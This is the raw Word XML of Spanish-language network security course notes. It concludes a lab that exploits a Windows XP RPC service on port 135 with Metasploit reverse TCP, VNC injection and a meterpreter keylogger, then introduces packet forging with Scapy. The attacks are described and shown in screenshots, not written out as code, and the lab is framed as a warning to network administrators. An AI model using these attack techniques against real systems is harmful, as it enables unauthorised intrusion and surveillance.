              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image62.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="2501900"/>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contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="2209800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21" name="image52.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image52.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050"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contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="3200400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="32" name="image69.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image69.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="32004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contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Como comprobamos en la práctica este exploit utiliza el “Reverse TCP” aprovechando una vulnerabilidad del Windows XP (RTC) por lo tanto no es necesario que el cliente tenga ningún backdoor que le permita conectar al hacker si no que el Windows XP por defecto ya tiene un servicio en el puerto 135 que es vulnerable una vez establecemos conexión con el “Reverse TCP” inyectamos un cliente VNC que nos permitirá abrir sesión de escritorio remotamente. Las pruebas realizadas deberían funcionar incluso con un “service pack 3” pero solo en modo shell por lo tanto no veriamos el escritorio pero si el inductor DOS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusión:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Con la práctica del troyano que utilizaba el “Reverse TCP y el meterpreter” en linux y que también permite inyectar un “Keyloger” podemos observar que es relativamente fácil atacar sistemas con exploits diseñados por hackers expertos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Como administradores de red se debe entender que si para nosotros a sido relativamente fácil realizar estos 2 ataques cualquier red de una empresa mediana o grande es vulnerable a cualquier ataque disponible en “metasploit” </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(MUCHO PELIGRO).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Herramientas de Packet Forging 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">En los apuntes de la UF2 explicamos el funcionamiento de una herramienta muy sencilla que permite algunas funciones de forjado de paquetes (Hping3).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="368300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4" name="image25.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image25.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="368300"/>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contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El Hping tenía ciertas restricciones respecto al encapsulamiento y también al tipo de protocolos de la capa de aplicación una alternativa más avanzada al uso del Hping es el “scapy”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scapy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scapy es una herramienta de el Packet Forging avanzado que permite crear paquetería pasando por todas las capas posibles del modelo TCP/IP aparte permite también que los lenguajes de programación como el “Python” puedan hacer llamadas a sus librerías por lo tanto lo hace una herramienta potente y versátil.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3771900" cy="1733550"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11" name="image38.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image38.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3771900" cy="173355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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Con esta herramienta podemos realizar ataques complejos contra host dispositivos de red, servicios de red etc. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls(): </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listar relacion de protocolos que permiten al scapy forjar paquetes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lsc(): </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lista la relación de comandos de uso de la consola de scapy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sniff(): </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sniffer encapsulado dentro de scapy que se puede usar también en programas creados con python.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A continuación aprenderemos a encapsular un simple paquete de tipo “IP” en el que se deben inicializar algunos de sus campos imprescindibles como son: la ip origen, la ip destino, número de saltos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="2971800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="573405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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3886200" cy="2957513"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="26" name="image57.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image57.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3886200" cy="2957513"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Una vez tenemos montados los PDU (Protocol Data Unit) es el momento de encapsular el paquete final denominado en este caso “mipaquete”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Con el comando “send” enviamos el paquete y nos devuelve paquete enviado pero no se muestra resultado, con el wireshark podemos verificar que la encapsulación es correcta y que el paquete llega al destino y este responde.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="1771650" cy="533400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5" name="image26.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image26.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1771650" cy="533400"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="461963"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="38" name="image76.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image76.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="461963"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
